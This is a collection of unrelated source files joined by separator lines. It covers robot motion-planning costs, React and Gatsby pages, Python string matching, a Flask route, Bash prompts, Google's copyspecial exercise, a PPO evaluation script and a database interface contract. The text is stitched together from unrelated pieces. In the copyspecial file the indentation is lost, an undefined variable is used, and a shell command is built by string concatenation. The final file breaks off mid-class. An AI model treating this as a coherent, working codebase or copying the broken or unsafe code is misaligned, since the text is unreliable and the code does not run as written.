  // setting cartesian error range
  min_twist_error_ = tool_goal_tolerance_;
  max_twist_error_.resize(min_twist_error_.size());
  max_twist_error_.head(3) = min_twist_error_.head(3)*POS_MAX_ERROR_RATIO;
  max_twist_error_.tail(3) = min_twist_error_.tail(3)*ROT_MAX_ERROR_RATIO;
  return true;
}
// Computes rollout costs as the scaled cartesian distance between the
// trajectory's final tool pose and the goal tool pose. Only the last
// timestep receives a non-zero cost; the rollout is valid when every
// twist-error component is within the goal tolerance.
bool ToolGoalPose::computeCosts(const Eigen::MatrixXd& parameters,
                          std::size_t start_timestep,
                          std::size_t num_timesteps,
                          int iteration_number,
                          int rollout_number,
                          Eigen::VectorXd& costs,
                          bool& validity)
{
  using namespace Eigen;
  using namespace utils::kinematics;
  validity = true;
  // Maps each component of 'val' into [0, 1] relative to its [min, max]
  // range, clamping out-of-range components first.
  auto compute_scaled_error = [](const VectorXd& val,VectorXd& min,VectorXd& max) -> VectorXd
  {
    VectorXd capped_val;
    capped_val = (val.array() > max.array()).select(max,val);
    // BUG FIX: clamp the already max-capped vector; the original selected
    // from 'val' here, which discarded the upper clamp applied above.
    capped_val = (capped_val.array() < min.array()).select(min,capped_val);
    auto range = max - min;
    VectorXd scaled = (capped_val - min).array()/(range.array());
    return scaled;
  };
  // FK for the last point of the trajectory.
  last_joint_pose_ = parameters.rightCols(1);
  state_->setJointGroupActivePositions(group_name_,last_joint_pose_);
  state_->updateLinkTransforms();
  last_tool_pose_ = state_->getGlobalLinkTransform(tool_link_);
  // computing twist error
  Eigen::Affine3d tf = tool_goal_pose_.inverse() * last_tool_pose_;
  Eigen::Vector3d angles_err = tf.rotation().eulerAngles(2,1,0);
  angles_err.reverseInPlace();
  Eigen::Vector3d pos_err = tool_goal_pose_.translation() - last_tool_pose_.translation();
  tool_twist_error_.resize(6);
  tool_twist_error_.head(3) = pos_err.head(3);
  tool_twist_error_.tail(3) = angles_err.tail(3);
  // computing relative error values
  VectorXd scaled_twist_error = compute_scaled_error(tool_twist_error_,min_twist_error_,max_twist_error_);
  double pos_error = scaled_twist_error.head(3).cwiseAbs().maxCoeff();
  double orientation_error = scaled_twist_error.tail(3).cwiseAbs().maxCoeff();
  // computing cost of last point
  costs.resize(parameters.cols());
  costs.setConstant(0.0);
  costs(costs.size()-1) = pos_error*position_cost_weight_ + orientation_error * orientation_cost_weight_;
  // check if valid when twist errors are below the allowed tolerance.
  validity = (tool_twist_error_.cwiseAbs().array() <= tool_goal_tolerance_.array()).all();
  return true;
}
// Called when the optimization finishes; logs the final tool twist error,
// the tolerance used, and the last joint position for debugging.
void ToolGoalPose::done(bool success,int total_iterations,double final_cost,const Eigen::MatrixXd& parameters)
{
  ROS_DEBUG_STREAM(getName()<<" last tool error: "<<tool_twist_error_.transpose());
  ROS_DEBUG_STREAM(getName()<<" used tool tolerance: "<<tool_goal_tolerance_.transpose());
  ROS_DEBUG_STREAM(getName()<<" last joint position: "<<last_joint_pose_.transpose());
}
} /* namespace cost_functions */
} /* namespace stomp_moveit */
|
package gb.esac.tools;
import gb.esac.timeseries.TimeSeries;
import gb.esac.timeseries.TimeSeriesMaker;
import gb.esac.timeseries.TimeSeriesUtils;
public class TestDataUtils {
    /**
     * Round-trips a QDP light curve: writes the original (with gaps) to
     * lc-gaps.qdp, fills the gaps, then writes the result to lc-noGaps.qdp
     * for comparison. Reads the input from lc7.qdp in the working directory.
     */
    public static void testFillGaps() throws Exception {
        TimeSeries ts = (TimeSeries) TimeSeriesMaker.makeTimeSeries("lc7.qdp");
        ts.writeCountsAsQDP("lc-gaps.qdp");
        ts = TimeSeriesUtils.fillGaps(ts);
        ts.writeCountsAsQDP("lc-noGaps.qdp");
    }
    public static void main(String[] args) throws Exception {
        testFillGaps();
    }
}
|
import React from 'react';
import { WRAP_NEAR_CONTRACT_ID } from '~services/wrap-near';
import { TokenMetadata } from '../../services/ft-contract';
import Token from './Token';
// Props for the TokenList component.
interface TokenListProps {
  /** Tokens to display, one row per token. */
  tokens: TokenMetadata[];
  /** Invoked with the token when a row is clicked. */
  onClick?: (token: TokenMetadata) => void;
  /** Optional custom renderer for each token row. */
  render?: (token: TokenMetadata) => React.ReactElement;
  /** Caller context; when it is 'deposit' the wNEAR wrap token is hidden. */
  calledBy?: string;
}
/**
 * Renders a vertical list of tokens. In the 'deposit' context the wNEAR
 * wrap token is excluded; all other callers see every token.
 */
export default function TokenList({
  tokens,
  onClick,
  render,
  calledBy,
}: TokenListProps) {
  // Filter up front instead of emitting `false` children from map()
  // (behavior is identical — React ignores boolean children — but the
  // element list stays clean and the loose `!=` comparisons go away).
  const visibleTokens = tokens.filter(
    (token) => calledBy !== 'deposit' || token.id !== WRAP_NEAR_CONTRACT_ID
  );
  const tokenElements = visibleTokens.map((token) => (
    <div className="text-xs font-semibold" key={token.id} title={token.id}>
      <Token token={token} onClick={onClick} render={render} />
    </div>
  ));
  return <div className="divide-y">{tokenElements}</div>;
}
|
<filename>src/pages/about-me.js
import React from 'react';
import { Link } from 'gatsby';
import styled, { css } from 'styled-components';
import Layout from '../components/layout';
import SEO from '../components/seo';
import ProfileImg from '../components/about/ProfileImg';
import mentor from '../asset/icon/mentor2.png';
import leader from '../asset/icon/leader2.png';
import hackathon from '../asset/icon/hackathon2.png';
import code from '../asset/icon/code2.png';
import Career from '../components/about/Career';
import SideProject from '../components/about/SideProject';
import Active from '../components/about/Active';
import TechStack from '../components/about/TechStack';
const AboutMe = () => {
const career = [
{
period: '2020.11',
job: 'startup co-founder Front-End Dev',
project:
'React,Redux,React-Saga를 활용하여 store정보를 입력,수정, 보여주는 Product 제작',
current: true,
},
{
period: '2019.11',
job: 'Pusan Likelion Works Teacher',
project:
'HTML,CSS, Python, Django를 기본으로 한 web develop 기초 교육(1,2,3기 진행)',
current: true,
},
{
period: '2020.10 \n 2020.11',
job: 'startup Front-End Dev',
project: 'react와 redux를 이용하여 영양제 제조 service 개발, ',
current: false,
},
{
period: '2019.11 \n 2020.06',
job: 'startup FullStack Dev',
project:
'Django와 AWS(EC2,LB,Route53)이용한 full community Site 제작 및 운영',
current: false,
},
];
const sideproject = [
{
period: '2020.12',
name: 'UMK MBTI TEST \n (React, Redux, amplify)',
direction: 'top',
},
{
period: '2020.09',
name: 'AngelHack \n (Django)',
direction: 'bottom',
},
{
period: '2020.04',
name: '선거 정보 알림 서비스 \n (Django,EC2)',
direction: 'top',
},
{
period: '2020.03',
name: 'PNU LL Apply Page \n (Django, BootStrap)',
direction: 'bottom',
},
{
period: '2019.10',
name: 'To do Love \n Play Store 출시 \n (RN)',
direction: 'top',
},
];
const active = [
{
icon: mentor,
desc:
'청소년 대상 프로그래밍 멘토링 진행 KB국민은행 X 멋쟁이사자처럼',
},
{
icon: hackathon,
desc: '다수 해커톤에 재미있게 참여했지만 수상은 😢',
},
{
icon: code,
desc:
'Django 공식 Repo에 debugging PR을 날렸지만 다른분이 PR 빼앗아가서 슬픔',
},
{
icon: leader,
desc: '부산 멋쟁이사자처럼 7기 대표',
},
];
const stack = [
{
name: 'HTML/CSS',
desc: '요청한 모든 디자인 구현 가능',
score: 6,
},
{
name: 'JS',
desc: 'Vanilla JS로 DOM조작을 통한 Interaction',
score: 2,
},
{
name: 'Django',
desc: 'Web Service를 Full로 만들 수 있고, 수업 가능',
score: 4,
},
{
name: 'Git',
desc: '협업을 하는데 무리없음, 필요한 부분 찾아서 적용가능',
score: 2,
},
{
name: 'AWS',
desc:
'Route 53, Amplify, EC2, ELB, EB 등을 사용해보고, 관심도 많음',
score: 0.5,
},
{
name: 'React',
desc: 'Redux, Redux-Saga를 사용하여 기본적인 SPA 작성가능.',
score: 2,
},
{
name: 'RN',
desc:
'LocalStorage를 이용해 Gamification이 적용된 TodoApp PlayStore에 출시.',
score: 1,
},
{
name: 'Gatsby',
desc:
'공식문서를 읽고, 다른 블로그를 참고하여 본인만의 정적 Site 생성.',
score: 2,
},
{
name: 'ML',
desc: '관심이 있어 책을 3권째 읽고 틈틈히 공부를 하려는 시도 중.',
score: 0.25,
},
];
const myValues = [
'- 구글링으로 해결 못할 것은 없다.',
'- 선한 영향을 주는 개발자가 되자',
];
const totalEffect = 205000;
const student = 100;
return (
<>
<SEO title="About-Me" />
<Layout about>
<LeftSection>
<Career career={career} />
</LeftSection>
<RightSection>
<SideProject sideproject={sideproject} />
<Active active={active} />
<TechStack stack={stack} />
</RightSection>
</Layout>
</>
);
};
export default AboutMe;
// Left column: translucent white gradient panel holding the career timeline.
// (Comments are kept outside the template literal — its contents are the
// runtime CSS string.)
const LeftSection = styled.section`
  flex: 1;
  background: white;
  /* rgba(199, 245, 147, 0.4),
    rgba(245, 211, 162, 0.4)*/
  background: linear-gradient(
    to right bottom,
    rgba(255, 255, 255, 0.5),
    rgba(255, 255, 255, 0.2)
  );
  padding: 3rem;
  @media (max-width: 1024px) {
    flex: auto;
    border-radius: 0 0 1.5rem 1.5rem;
  }
  @media (max-width: 475px) {
    padding: 1rem;
  }
`;
// Right column: vertically stacked side-project / activity / tech-stack blocks.
const RightSection = styled.section`
  flex: 2;
  display: flex;
  padding: 2rem;
  flex-direction: column;
  align-items: flex-start;
  justify-content: space-between;
  @media (max-width: 1024px) {
    flex: auto;
  }
`;
|
<reponame>srudqvist/AlgorithmsProgrammingAssignments<gh_stars>0
### File: BruteForceStringMatching.py
### Author: <NAME>
### CSCI 0262 Algorithms
###
###
###
### Modification Log:
###
###
### ---------------------------------------------------
### PART A BRUTE FORCE STRING MATCHING
### ---------------------------------------------------
def stringMatching(longText, searchString):
    """Return the index of the FIRST occurrence of searchString in longText.

    Brute-force comparison. Returns -1 when there is no match or when the
    inputs are invalid (empty strings or non-string arguments).
    """
    try:
        if longText.isspace():
            print("Check the input, longText is only spaces.")
        if longText == "":
            print("No long string")
            return -1
        if searchString == "":
            print("No search string")
            return -1
        longTextLength = len(longText)
        searchStringLength = len(searchString)
        stringLength = longTextLength - searchStringLength
        # Slide the pattern across the text one position at a time.
        for posInText in range(stringLength + 1):
            stringIndex = 0
            while (stringIndex < searchStringLength
                   and searchString[stringIndex] == longText[posInText + stringIndex]):
                stringIndex += 1
            # All pattern characters matched at this position.
            if stringIndex == searchStringLength:
                return posInText
        return -1
    except (TypeError, AttributeError):
        # Narrowed from a bare `except:` so unrelated errors (e.g.
        # KeyboardInterrupt) are no longer silently swallowed; these two
        # cover non-string arguments (no .isspace / unsupported len or
        # indexing).
        print("Check the input, this function only takes strings")
        print("Returned -1 since this test should fail since there is no string matching")
        return -1
### ---------------------------------------------------
### PART B FIND THE LAST OCCURENCE
### ---------------------------------------------------
def findLast(longText, searchString):
    """Return the index of the LAST occurrence of searchString in longText.

    Brute-force comparison. Returns -1 when there is no match or when the
    inputs are invalid (empty strings or non-string arguments).
    """
    try:
        if longText.isspace():
            print("Check the input, longText is only spaces.")
        if longText == "":
            print("Check the input, there is no long string.")
            return -1
        if searchString == "":
            print("Check the input, there is no search string.")
            return -1
        longTextLength = len(longText)
        searchStringLength = len(searchString)
        stringLength = longTextLength - searchStringLength
        # BUG FIX: the original used 0 as the "no match yet" sentinel, so a
        # pattern found ONLY at index 0 was reported as not found (-1).
        # Use -1 as the sentinel and return it directly.
        lastOccurrence = -1
        for posInText in range(stringLength + 1):
            stringIndex = 0
            while (stringIndex < searchStringLength
                   and searchString[stringIndex] == longText[posInText + stringIndex]):
                stringIndex += 1
            if stringIndex == searchStringLength:
                # Remember the most recent match and keep scanning for later ones.
                lastOccurrence = posInText
        return lastOccurrence
    except (TypeError, AttributeError):
        # Narrowed from a bare `except:`; covers non-string arguments.
        print("Check the input, this function only takes strings")
        print("Returned -1 since this test should fail since there is no string matching")
        return -1
def testCaseA(testNumber, longText, searchString, expectedResult):
    """Run stringMatching on one input and print whether it met expectations."""
    actualResult = stringMatching(longText, searchString)
    if actualResult != expectedResult:
        print("Test", testNumber, "failed. Expected", expectedResult, "but found", actualResult)
    else:
        print("Test", testNumber, "passed.")
def testA():
    """Exercise stringMatching with matching, non-matching, and bad inputs."""
    cases = [
        ("Oh I wish I were an aardvark.", "were", 12),
        ("Oh I wish I were an aardvark.", "join", -1),
        ("She sells sea shells by the seashore.", "seashore", 28),
        ("Testing a STr1nG with uppercase and numbers", "string", -1),
        (123456, 23, -1),
        ("<NAME>", "e", 10),
    ]
    for number, (longText, searchString, expected) in enumerate(cases, start=1):
        testCaseA(number, longText, searchString, expected)
def testCaseB(testNumber, longText, searchString, expectedResult):
    """Run findLast on one input and print whether it met expectations."""
    actualResult = findLast(longText, searchString)
    if actualResult != expectedResult:
        print("Test", testNumber, "failed. Expected", expectedResult, "but found", actualResult)
    else:
        print("Test", testNumber, "passed.")
def testB():
    """Exercise findLast with repeated, missing, and empty patterns."""
    cases = [
        ("Oh I wish I were an aardvark.", "I w", 10),
        ("Oh I wish I were an aardvark.", "anteater", -1),
        ("She sells sea shells by the seashore.", "sea", 28),
        ("So so So so So So soSo many occurrences here", "So", 20),
        ("", "", -1),
        ("hello there", "e", 10),
    ]
    for number, (longText, searchString, expected) in enumerate(cases, start=1):
        testCaseB(number, longText, searchString, expected)
# Run both test suites when the module is executed (or imported).
testA()
testB()
|
from flask import Blueprint, request
from services import blog_service
from models.blog import Blog, BlogSchema
blog_api = Blueprint('blog_api', __name__)
@blog_api.route('/', methods=['GET'])
def all():
    """Return one page of blog posts as JSON.

    The page number comes from the ``page`` query parameter and defaults to
    1 when it is missing or non-numeric. (The original called
    ``int(request.args.get('page'))``, which raised TypeError — a 500 — on
    any request without the parameter.)
    """
    requested_page = request.args.get('page', default=1, type=int)
    blog = blog_service.page(requested_page)
    if blog is None:
        return {}
    return BlogSchema().dumps(blog).data
|
#!/usr/bin/env bash
# @file Interaction
# @brief Functions to enable interaction with the user.
# @description Prompt yes or no question to the user.
#
# @example
# interaction::prompt_yes_no "Are you sure to proceed" "yes"
# #Output
# Are you sure to proceed (y/n)? [y]
#
# @arg $1 string The question to be prompted to the user.
# @arg $2 string default answer \[yes/no\] (optional).
#
# @exitcode 0 If user responds with yes.
# @exitcode 1 If user responds with no.
# @exitcode 2 Function missing arguments.
interaction::prompt_yes_no() {
  [[ $# = 0 ]] && printf "%s: Missing arguments\n" "${FUNCNAME[0]}" && return 2
  declare def_arg response
  def_arg=""
  response=""
  # Normalize the optional default answer ($2) to a single letter y/n;
  # anything else means "no default".
  case "${2}" in
    [yY] | [yY][eE][sS])
      def_arg=y
      ;;
    [nN] | [nN][oO])
      def_arg=n
      ;;
  esac
  # Re-prompt until the user gives a recognizable yes/no (or accepts the default).
  while :; do
    printf "%s (y/n)? " "${1}"
    [[ -n "${def_arg}" ]] && printf "[%s] " "${def_arg}"
    read -r response
    # An empty reply selects the default answer, if any.
    [[ -z "${response}" ]] && response="${def_arg}"
    case "${response}" in
      [yY] | [yY][eE][sS])
        response=y
        break
        ;;
      [nN] | [nN][oO])
        response=n
        break
        ;;
      *)
        # Unrecognized input: clear it and ask again.
        response=""
        ;;
    esac
  done
  # Exit status encodes the answer: 0 = yes, 1 = no.
  [[ "${response}" = 'y' ]] && return 0 || return 1
}
# @description Prompt question to the user.
#
# @example
# interaction::prompt_response "Choose directory to install" "/home/path"
# #Output
# Choose directory to install? [/home/path]
#
# @arg $1 string The question to be prompted to the user.
# @arg $2 string default answer (optional).
#
# @exitcode 0 If user responds with answer.
# @exitcode 2 Function missing arguments.
#
# @stdout User entered answer to the question.
interaction::prompt_response() {
  [[ $# = 0 ]] && printf "%s: Missing arguments\n" "${FUNCNAME[0]}" && return 2
  declare def_arg response
  response=""
  def_arg="${2}"
  # Re-prompt until a non-empty answer is given or the default is accepted.
  while :; do
    printf "%s ? " "${1}"
    # A default of "-" means "default to an empty answer" and is not displayed.
    [[ -n "${def_arg}" ]] && [[ "${def_arg}" != "-" ]] && printf "[%s] " "${def_arg}"
    read -r response
    [[ -n "${response}" ]] && break
    # Empty reply falls back to the default, if one was supplied.
    if [[ -z "${response}" ]] && [[ -n "${def_arg}" ]]; then
      response="${def_arg}"
      break
    fi
  done
  # Map the "-" placeholder back to an empty answer before printing.
  [[ "${response}" = "-" ]] && response=""
  printf "%s" "${response}"
}
|
<filename>copyspecial/copyspecial.py
#!/usr/bin/python
# Copyright 2010 Google Inc.
# Licensed under the Apache License, Version 2.0
# http://www.apache.org/licenses/LICENSE-2.0
# Google's Python Class
# http://code.google.com/edu/languages/google-python-class/
import sys
import re
import os
import shutil
import commands
"""Copy Special exercise
"""
def get_special_path(directory):
    """Return absolute paths of the "special" files in `directory`.

    A file is special when its name contains a word wrapped in double
    underscores, e.g. ``xyz__hello__.txt``.

    Args:
        directory: directory to scan (relative or absolute).
    Returns:
        List of absolute paths of the special files found.
    """
    special_paths = []
    files = os.listdir(directory)
    for filename in files:
        special_check = re.search(r'__(\w+)__', filename)
        if special_check:
            # Bug fix: abspath(filename) alone resolves against the current
            # working directory; join with `directory` first so the returned
            # path is correct when `directory` is not the cwd.
            file_path = os.path.abspath(os.path.join(directory, filename))
            special_paths.append(file_path)
    return special_paths
def copy_to(paths, directory):
    """Copy every file listed in `paths` into `directory`.

    The destination directory is created first when it does not exist.
    """
    if not os.path.exists(directory):
        os.mkdir(directory)
    for source in paths:
        shutil.copy(source, directory)
def zip_to(paths, zippath):
# To zip all the files
cmd = 'zip -j ' + zippath + ' ' + ' '.join(paths)
(status, out) = commands.getstatusoutput(cmd)
if status:
sys.stderr.write(output)
sys.exit()
else:
print "ZipFile created"
def main():
# This basic command line argument parsing code is provided.
# Add code to call your functions below.
# Make a list of command line arguments, omitting the [0] element
# which is the script itself.
args = sys.argv[1:]
if not args:
print "usage: [--todir dir][--tozip zipfile] dir [dir ...]";
sys.exit(1)
# todir and tozip are either set from command line
# or left as the empty string.
# The args array is left just containing the dirs.
todir = ''
if args[0] == '--todir':
todir = args[1]
del args[0:2]
tozip = ''
if args[0] == '--tozip':
tozip = args[1]
del args[0:2]
if len(args) == 0:
print "error: must specify one or more dirs"
sys.exit(1)
paths = []
for dirname in args:
paths.extend(get_special_path(dirname))
if todir:
copy_to(paths, todir)
elif tozip:
zip_to(paths, tozip)
else:
print '\n'.join(paths)
if __name__ == "__main__":
main()
|
<gh_stars>0
import { createServer, proxy } from 'aws-serverless-express';
import { APIGatewayProxyEvent, Context } from 'aws-lambda';
import { createApp } from './app';

// Wrap the Express app in a Node HTTP server once per Lambda container,
// so warm invocations reuse the same server instance.
const server = createServer(createApp(), undefined);

// Lambda entry point: logs the incoming API Gateway event and proxies it
// to the Express server via aws-serverless-express.
export default function(event: APIGatewayProxyEvent, context: Context) {
    console.log(`Event: ${JSON.stringify(event)}`);
    return proxy(server, event, context);
}
|
/**@author <NAME>
 * CSS342 Algorithms and Data Structures
 * edited from "Objects and Classes Lecture by Professor <NAME>"
 */
#include <iostream>
#include "rat2.h"
using namespace std;
int main(){
    // Exercise the Rational class: print "a op b = result" for each
    // arithmetic operator, then read one Rational back from the user.
    Rational x(-2,6), y(-14,-16), z;

    cout << x << " + " << y;
    z = x + y;
    cout << " = " << z << endl;

    cout << x << " - " << y;
    z = x - y;
    cout << " = " << z << endl;

    cout << x << " * " << y;
    z = x * y;
    cout << " = " << z << endl;

    // Bug fix: the fourth case printed " * " twice and recomputed x - y
    // (a copy-paste of the subtraction test, so it printed "x * y * (x-y)").
    // Completing the four basic operations, it should exercise division.
    // NOTE(review): assumes Rational declares operator/ in rat2.h — confirm.
    cout << x << " / " << y;
    z = x / y;
    cout << " = " << z << endl;

    Rational a;
    cin >> a;
    cout << "Your Rational was " << a << endl;
    return 0;
}
|
<filename>eval.py
# -*- coding: utf-8 -*-
"""
Module for evaluating trained models.
Requires the trained model files to exist.
Running `python eval.py` prints average reward values to stdout.
"""
from time import time
from stable_baselines3 import PPO
from envs import EvalEnv, Player, ProbPlayer, JurinaPlayer, AIPlayer

# Paths of the trained model files to evaluate
PROP_PPO = 'prob_ppo'
PA_PPO = 'pa_ppo'
POLICY_PPO = 'policy_ppo'
PATHS = [PROP_PPO, PA_PPO, POLICY_PPO]
def eval_ppo(env_player, path=PROP_PPO, steps=100, debug=True):
    """
    Run the trained policy PPO for `steps` steps and print the
    average revenue per episode.

    Args:
        env_player: player instance used on the evaluation-environment side
        path:       path of the trained policy model file to load
        steps:      number of steps to execute
        debug:      if True, render the environment every step
    Returns:
        None
    """
    # Build the evaluation environment around the given opponent player
    env = EvalEnv(env_player)
    # Restore the trained policy model under evaluation
    model = PPO.load(path)
    # Initial observation at the start of the episode
    observation = env.reset()
    # Per-episode final rewards collected during the run
    revenue = []
    # Number of completed episodes (taken from env info)
    episodes = 0
    # Wall-clock timing of the evaluation loop
    elapsed = time()
    for _ in range(steps):
        policy_action = model.predict(observation)
        # model.predict may return (action, state); keep only the action
        if isinstance(policy_action, tuple):
            policy_action = policy_action[0]
        policy_action = int(policy_action)
        observation, reward, done, info = env.step(policy_action)
        if debug:
            env.render()
        if done:
            # Record the final reward of the finished episode and restart
            revenue.append(reward)
            episodes = info['episode_no']
            observation = env.reset()
    print(f'** path:{path} test')
    if debug:
        print(f'   env player {env_player.__class__.__name__}')
    print(f'   ran {steps} steps, {time() - elapsed} sec')
    if debug:
        print(f'   {episodes} episodes done')
    if len(revenue) <= 0:
        print(f'   no revenues')
    else:
        print(f'   revenue average: {sum(revenue)/len(revenue)} per episodes')
if __name__ == '__main__':
    """
    Print the average reward values of the trained models.
    """
    # Step counts to try for each evaluation run
    step_list = [10, 100, 1000, 10000]
    # Players used on the evaluation-environment side
    players = [Player(), ProbPlayer(), JurinaPlayer(), AIPlayer(PPO.load(PROP_PPO))]
    debug = False
    print('*****************************')
    # Evaluate every (steps, model, opponent player) combination
    for steps in step_list:
        for path in PATHS:
            for player in players:
                print(f'*** steps={steps}, path={path}, player={player.__class__.__name__}')
                eval_ppo(env_player=player, path=path, steps=steps, debug=debug)
                print('*****************************')
|
<reponame>quintel/etengine
# Creates a fake graph, API, and area capable of being used in calculations
# relating to household heat, EVs, and other curves.
module HouseholdCurvesHelper
  # Public: Creates a household heat curve set.
  # Looks up the named 'weather' curve-set variant on the Atlas dataset.
  def create_curve_set(dataset: :nl, variant: 'default')
    Atlas::Dataset.find(dataset).curve_sets.get('weather').variant(variant)
  end

  # Public: Creates a basic graph, graph API, and area stub.
  # Extra area_attributes are merged over the default { area_code: :nl }.
  def create_graph(**area_attributes)
    area_attributes = { area_code: :nl }.merge(area_attributes)
    graph = instance_double(
      Qernel::Graph,
      query: instance_double(Qernel::GraphApi::Energy),
      area: instance_double(Qernel::Area, area_attributes)
    )
    # Stub the custom-curves lookup so the graph reports no user curves.
    allow(graph).to receive(:dataset_get)
      .with(:custom_curves)
      .and_return(Gql::CustomCurveCollection.new({}))
    graph
  end
end
|
<filename>opentaps/opentaps-common/src/common/org/opentaps/gwt/common/server/form/CustomServiceValidationException.java
/*
* Copyright (c) Open Source Strategies, Inc.
*
* Opentaps is free software: you can redistribute it and/or modify it
* under the terms of the GNU Affero General Public License as published
* by the Free Software Foundation, either version 3 of the License, or
* (at your option) any later version.
*
* Opentaps is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU Affero General Public License for more details.
*
* You should have received a copy of the GNU Affero General Public License
* along with Opentaps. If not, see <http://www.gnu.org/licenses/>.
*/
package org.opentaps.gwt.common.server.form;
import org.ofbiz.service.ServiceValidationException;
import java.util.List;
import java.util.Map;
import java.util.HashMap;
/**
* An extension of <code>ServiceValidationException</code> that also support custom field error messages.
*/
public class CustomServiceValidationException extends ServiceValidationException {

    /** Per-field custom error messages; never null. */
    private Map<String, String> customFieldsErrors;

    /**
     * Creates a new <code>CustomServiceValidationException</code> instance.
     * @param missingFields the list of missing fields
     * @param extraFields the list of extra fields
     * @param customFieldsErrors the <code>Map</code> of fields and their custom error messages
     */
    public CustomServiceValidationException(List<String> missingFields, List<String> extraFields, Map<String, String> customFieldsErrors) {
        super("Validation Error", null, missingFields, extraFields, "IN");
        this.customFieldsErrors = (customFieldsErrors == null)
                ? new HashMap<String, String>()
                : customFieldsErrors;
    }

    /**
     * Gets the <code>Map</code> of fields and their custom error messages.
     * @return the <code>Map</code> of fields and their custom error messages
     */
    public Map<String, String> getCustomFieldsErrors() {
        return customFieldsErrors;
    }
}
|
package steuerung;
import java.util.List;
import modell.Fassade;
import modell.formel.Formel;
public class FormelEingeben extends WahrheitstabellenBefehl {

    // Column whose formula is being edited.
    private int spalte;
    // Previous formula in parseable form.
    private String alteFormel;
    // Previous formula's display representation.
    private String alteFormelRep;
    // Atomic propositions offered to the formula editor.
    private List<String> atomareAussagen;

    /**
     * Constructor for the command, which also executes it immediately.
     *
     * @param model  the facade the command operates on.
     * @param spalte the column whose formula is to be changed.
     */
    public FormelEingeben(Fassade model, int spalte) {
        super(model);
        this.spalte = spalte;
        hohleDaten();
        setzeDaten();
    }

    /**
     * Fetches the old formula and the atomic propositions from the facade.
     */
    public void hohleDaten() {
        alteFormel = model.gibFormelParsabel(spalte);
        alteFormelRep = model.gibFormelText(spalte);
        atomareAussagen = model.gibAtomareAussage();
    }

    /**
     * Opens the dialog window in which the formula can be edited, and
     * passes the new formula to the model via the facade.
     */
    public void setzeDaten() {
        FormelEditor fe = new FormelEditor(atomareAussagen);
        String neueFormel = fe.gibNeueFormel(alteFormel, alteFormelRep);
        // "-1" signals the dialog was cancelled; "" means no input was given.
        if (neueFormel.equals("-1") || neueFormel.equals("")) {
            return;
        }
        Formel neueFormelF = FormelParser.pars(neueFormel, model);
        model.setzeFormel(neueFormelF, spalte);
    }
}
|
from abc import ABC, abstractmethod
from typing import Any, Dict, List, Union, Mapping, Optional
# Optional dependencies: when SQLAlchemy/databases are not installed, fall
# back to None placeholders so the type hints below still resolve.
try:
    from sqlalchemy.engine import Engine
    from sqlalchemy import MetaData, Table
    from databases import Database as EncodeDatabase
    from sqlalchemy.sql import ClauseElement
    from sqlalchemy.engine.result import RowProxy
except ImportError:
    # Bug fix: a bare `except:` also swallowed SystemExit/KeyboardInterrupt;
    # only a failed import should trigger the fallback.
    # NOTE(review): `sa` is never imported above — kept in case code outside
    # this view references it; confirm it can be dropped.
    sa = None
    Engine = None
    Table = None
    MetaData = None
    EncodeDatabase = None
    ClauseElement = None
    RowProxy = None
from uvicore.contracts import DbQueryBuilder
from .connection import Connection
from .package import Package
class Database(ABC):
    """Abstract contract for the database system: registered connections,
    SQLAlchemy engines/metadata, Encode databases, and query execution
    helpers, each keyed by connection name or "metakey"."""
    pass

    @property
    @abstractmethod
    def default(self) -> str:
        """The default connection str for the main running app"""
        pass

    @property
    @abstractmethod
    def connections(self) -> Dict[str, Connection]:
        """All connections from all packages, keyed by connection str name"""
        pass

    @property
    @abstractmethod
    def engines(self) -> Dict[str, Engine]:
        """All engines for all unique (by metakey) connections, keyed by metakey"""
        pass

    @property
    @abstractmethod
    def databases(self) -> Dict[str, EncodeDatabase]:
        """All Encode Databases for all unique (by metakey) connections, keyed by metakey"""
        pass

    @property
    @abstractmethod
    def metadatas(self) -> Dict[str, MetaData]:
        """All SQLAlchemy Metadata for all unique (by metakey) connections, keyed by metakey"""
        pass

    @abstractmethod
    def init(self, default: str, connections: List[Connection]) -> None:
        """Initialize the database system with a default connection str and List of all Connections from all packages"""
        pass

    @abstractmethod
    def packages(self, connection: str = None, metakey: str = None) -> List[Package]:
        """Get all packages with the metakey (direct or derived from connection str)."""
        pass

    @abstractmethod
    def metakey(self, connection: str = None, metakey: str = None) -> str:
        """Get one metekay by connection str or metakey"""
        pass

    @abstractmethod
    def connection(self, connection: str = None) -> Connection:
        """Get one connection by connection name"""
        pass

    @abstractmethod
    def metadata(self, connection: str = None, metakey: str = None) -> MetaData:
        """Get one SQLAlchemy Metadata by connection str or metakey"""
        pass

    @abstractmethod
    def table(self, table: str, connection: str = None) -> Table:
        """Get one SQLAlchemy Table by name (without prefix) and connection str or connection.tablename dot notation"""
        pass

    @abstractmethod
    def tablename(self, table: str, connection: str = None) -> str:
        """Get a SQLAlchemy tablename with prefix by name (without prefix) and connection str or connection.tablename dot notation"""
        pass

    @abstractmethod
    def engine(self, connection: str = None, metakey: str = None) -> Engine:
        """Get one SQLAlchemy Engine by connection str or metakey"""
        pass

    @abstractmethod
    async def database(self, connection: str = None, metakey: str = None) -> EncodeDatabase:
        """Get one Encode Database by connection str or metakey"""
        pass

    @abstractmethod
    async def disconnect(self, connection: str = None, metakey: str = None, from_all: bool = False) -> None:
        """Disconnect from a database by connection str or metakey. Of ALL databases."""
        pass

    @abstractmethod
    async def fetchall(self, query: Union[ClauseElement, str], values: Dict = None, connection: str = None, metakey: str = None) -> List[RowProxy]:
        """Fetch List of records from a SQLAlchemy Core Query based on connection str or metakey"""
        pass

    @abstractmethod
    async def fetchone(self, query: Union[ClauseElement, str], values: Dict = None, connection: str = None, metakey: str = None) -> Optional[RowProxy]:
        """Fetch one record from a SQLAlchemy Core Query based on connection str or metakey"""
        pass

    @abstractmethod
    async def execute(self, query: Union[ClauseElement, str], values: Union[List, Dict] = None, connection: str = None, metakey: str = None) -> Any:
        """Execute a SQLAlchemy Core Query based on connection str or metakey"""
        pass

    @abstractmethod
    def query(self, connection: str = None) -> DbQueryBuilder[DbQueryBuilder, None]:
        """Database query builder passthrough"""

    # Commented-out draft of an event/listener API, kept for reference.
    # @property
    # @abstractmethod
    # def events(self) -> Dict: pass

    # @property
    # @abstractmethod
    # def listeners(self) -> Dict[str, List]: pass

    # @property
    # @abstractmethod
    # def wildcards(self) -> List: pass

    # @abstractmethod
    # def register(self, events: Dict):
    #     pass

    # @abstractmethod
    # def listen(self, events: Union[str, List], listener: Any) -> None:
    #     pass

    # @abstractmethod
